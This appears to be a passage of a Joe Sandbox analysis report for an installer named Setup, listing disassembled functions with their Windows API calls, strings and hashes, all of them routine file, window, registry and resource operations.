Opcode Fuzzy Hash: e554c22c2b6c1c79bf4e3bd9589f638704a5c3b9e23afc358b40755e2967a902
Instruction Fuzzy Hash: 28B092A0A80780A8DE10BFB3A843A0B28048590B1A720403B302479083EB7E85145E7F

Function 00471278 Relevance: 6.3, APIs: 4, Instructions: 263fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,00471449,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5), ref: 00471425
FindClose.KERNEL32(000000FF,00471450,00471449,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5,?), ref: 00471443
FindNextFileA.KERNEL32(000000FF,?,00000000,0047156B,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5), ref: 00471547
FindClose.KERNEL32(000000FF,00471572,0047156B,?,00000000,?,0049B178,00000000,00471617,?,00000000,?,00000000,?,004717E5,?), ref: 00471565

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 2023dbc865ddb19b7660e0733208fd9d0bd48eade57b11d44011460c9e31b170
Instruction ID: 0f4871d982279d9997c19f03ad0fbebdd4117ece3c196d883e63fe27161a8bf3
Opcode Fuzzy Hash: 2023dbc865ddb19b7660e0733208fd9d0bd48eade57b11d44011460c9e31b170
Instruction Fuzzy Hash: 1FB12F3490425D9FCF11DFA9C881ADEBBB9FF49304F5081A6E848B7261D7389A45CF54

Function 0047C458 Relevance: 6.2, APIs: 4, Instructions: 194fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0047C5C8,?,?,?,?,00000000,0047C71D,?,00000000,00000000,00000000,?,0047C871), ref: 0047C5A4
FindClose.KERNEL32(000000FF,0047C5CF,0047C5C8,?,?,?,?,00000000,0047C71D,?,00000000,00000000,00000000,?,0047C871,00000000), ref: 0047C5C2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 252527c0bd008b6c2e5ff0ed922c357c1cac3ddd8438bbe42ed430d59abe6e2d
Instruction ID: 9cbd629fba0131c534336b548e2a3d064dbd11d36534118a4e528ca36bdac333
Opcode Fuzzy Hash: 252527c0bd008b6c2e5ff0ed922c357c1cac3ddd8438bbe42ed430d59abe6e2d
Instruction Fuzzy Hash: 56813F7090025DAFCF11DF95CC91ADFBBB9EF49304F5080AAE418A7291D7399A46CF58

Function 0047E534 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?,?,00000000), ref: 0047E5DA
FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?,?), ref: 0047E5E7
FindNextFileA.KERNEL32(000000FF,?,00000000,0047E700,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A), ref: 0047E6DC
FindClose.KERNEL32(000000FF,0047E707,0047E700,?,?,?,?,00000000,0047E72D,?,00000000,00000000,?,?,0047F94A,?), ref: 0047E6FA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 6634d0a35b9fd8c96f661c01fa515a2604aafda9aef2d8904d243c9e8a8932ae
Instruction ID: 28583fff67185971eef34c5c69b0e551aac517942e8b674ad10e64284e68e1a2
Opcode Fuzzy Hash: 6634d0a35b9fd8c96f661c01fa515a2604aafda9aef2d8904d243c9e8a8932ae
Instruction Fuzzy Hash: D4515F70900648AFCB10EFA6CC45ADEB7B8EB48319F5085EAE408E7351D6389F45CF54

Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00421371
SetMenu.USER32(00000000,00000000), ref: 0042138E
SetMenu.USER32(00000000,00000000), ref: 004213C3
SetMenu.USER32(00000000,00000000), ref: 004213DF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D

Function 0047469C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA

Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31

GetLastError.KERNEL32(00000000,00474811,?,?,0049B178,00000000), ref: 004746FA

Strings

MoveFileEx, xrefs: 0047475F
LoggedMsgBox returned an unexpected value. Assuming Cancel., xrefs: 004747CF
, xrefs: 00474732, 0047474D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountErrorFileLastMoveTick
String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
API String ID: 2406187244-2685451598
Opcode ID: e22ca60a21e9092a49f1b261e96470cc605cd5db2b41b3798889fd4d92af7691
Instruction ID: e9099c621665a946f5b0db8f2b3318fd5b54847bcac127bf4feb9123ba8a5391
Opcode Fuzzy Hash: e22ca60a21e9092a49f1b261e96470cc605cd5db2b41b3798889fd4d92af7691
Instruction Fuzzy Hash: 19417674A002198FCB10EFA5D882AFE77B4EF89314F518537E414B7391D73C9A058BA9

Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00413D56
GetDesktopWindow.USER32 ref: 00413E0E

Part of subcall function 00418ED0: 6F62C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09

SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: 73dcdc83b1374486e65c052d23787486e7855e27ef245267efa45d742c83fe36
Instruction ID: e2b40933eaa0fc3897f21c5fde1f565ed88b9ae04919b2fb555629855e5f5a84
Opcode Fuzzy Hash: 73dcdc83b1374486e65c052d23787486e7855e27ef245267efa45d742c83fe36
Instruction Fuzzy Hash: DD415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A

Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767

Function 0044E118 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161

Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6

InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5

Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8

IsRectEmpty.USER32(?), ref: 0044E1A7
ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
String ID:
API String ID: 855768636-0
Opcode ID: e0aac262193eaf386a507cc14a48f7de87f8a217b262bdcf0c3e92448fc10a7d
Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
Opcode Fuzzy Hash: e0aac262193eaf386a507cc14a48f7de87f8a217b262bdcf0c3e92448fc10a7d
Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399

Function 00493F88 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,00000000), ref: 00493FEC
OffsetRect.USER32(?,00000000,?), ref: 00494007
OffsetRect.USER32(?,?,00000000), ref: 00494021
OffsetRect.USER32(?,00000000,?), ref: 0049403C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: ab4949aaadf672aa91bcf60ec4cb1bd0ff8ae663f32d17df6b9826decd7ffb93
Instruction ID: 6ea8699f142f5b744308f5fb49fe63af15150726bd9fdc74535c03b54fc39d6b
Opcode Fuzzy Hash: ab4949aaadf672aa91bcf60ec4cb1bd0ff8ae663f32d17df6b9826decd7ffb93
Instruction Fuzzy Hash: 9E218EB67042019FD700DE69CD85E6BB7EEEBC4304F14CA2AF594C7349D634E9448796

Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00417270
SetCursor.USER32(00000000), ref: 004172B3
GetLastActivePopup.USER32(0001041A), ref: 004172DD
GetForegroundWindow.USER32(0001041A), ref: 004172E4

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: 1f027ba62758c6f6e16121a435271ae36784e877d78f723a05b38686a1b288de
Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
Opcode Fuzzy Hash: 1f027ba62758c6f6e16121a435271ae36784e877d78f723a05b38686a1b288de
Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89

Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 00416B94
SetTextColor.GDI32(?,00000000), ref: 00416BAE
SetBkColor.GDI32(?,00000000), ref: 00416BC8
CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: b0c22414d8d6ee8c0768b7de9f95348b00eaa8cdfd25ecd6e365b81aea8fb789
Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
Opcode Fuzzy Hash: b0c22414d8d6ee8c0768b7de9f95348b00eaa8cdfd25ecd6e365b81aea8fb789
Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69

Function 00493C40 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000008,?), ref: 00493C55
MulDiv.KERNEL32(?,00000008,?), ref: 00493C69
MulDiv.KERNEL32(?,00000008,?), ref: 00493C7D
MulDiv.KERNEL32(?,00000008,?), ref: 00493C9B

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction ID: 8abd8040eba731fbe526ab5f7b53f6c2a8ab0f8d37bf7bd3a460e12037392c69
Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction Fuzzy Hash: 7F112E72604604ABCF40DEA9D8C4D9B7BECEF4D364B1441AAF918EB246D634ED408BA4

Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
RegisterClassA.USER32(00498598), ref: 0041F4E4
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
Opcode Fuzzy Hash: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD

Function 004544A8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32(00000001,00000032), ref: 004544D4
MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004544F6
GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454505
CloseHandle.KERNEL32(00000001,00454532,0045452B,?,00000031,00000080,00000000,?,?,0045488B,00000080,0000003C,00000000,004548A1), ref: 00454525

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: 6c395a4cbddd5ff379c035570a69c2252dcca9627cd29b4b80edcc11da6b80a2
Instruction ID: 349487cf624deee767c852797b2fe0003e47ef85cfa7f40603711d6a768e5e19
Opcode Fuzzy Hash: 6c395a4cbddd5ff379c035570a69c2252dcca9627cd29b4b80edcc11da6b80a2
Instruction Fuzzy Hash: 15012D706406087FEB209B968C06F6B7BACDF49774F510167FA04DB2C2D5788E40CA69

Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758,0000000A,REGDLL_EXE), ref: 0040D241
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758), ref: 0040D25B
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 3e4229e138499de8d2808c65d3409da6e5b604f2f015f14c2150909c6176e447
Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
Opcode Fuzzy Hash: 3e4229e138499de8d2808c65d3409da6e5b604f2f015f14c2150909c6176e447
Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78

Function 004019CC Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0049A420), ref: 004019E2
RtlEnterCriticalSection.KERNEL32(0049A420), ref: 004019F5
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401A82,?,?,0040222E,0049A460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
RtlLeaveCriticalSection.KERNEL32(0049A420), ref: 00401A7C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF

Function 0046EF3C Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 0046EF8D

Strings

Setting NTFS compression on directory: %s, xrefs: 0046EF5B
Failed to set NTFS compression state (%d)., xrefs: 0046EF9E
Unsetting NTFS compression on directory: %s, xrefs: 0046EF73

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: 4d755325268f4a89c9dfb9eaea4e80ade9d5edcaa75762690246f84edbb10df9
Instruction ID: 90f263befbfc2ed38cb9fa519f29dd23f6ca26fd9398365abe1a4f1750a61a51
Opcode Fuzzy Hash: 4d755325268f4a89c9dfb9eaea4e80ade9d5edcaa75762690246f84edbb10df9
Instruction Fuzzy Hash: D9016730E0828867CF08D7EE60412DDBBE49F4D354F5481EFB458DB282EB7905088BAB

Function 004552C8 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000,0045AFF5), ref: 00455304
RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000), ref: 0045530D
RemoveFontResourceA.GDI32(00000000), ref: 0045531A
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045532E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: b4e24295de118ea477065a5d010930c46b546572b3e041ca02720c421040fa74
Instruction ID: 52e3aeb2f0b2f45aa49b8753349bc449d62e6f0ad3e8c43972c27c65c40ff478
Opcode Fuzzy Hash: b4e24295de118ea477065a5d010930c46b546572b3e041ca02720c421040fa74
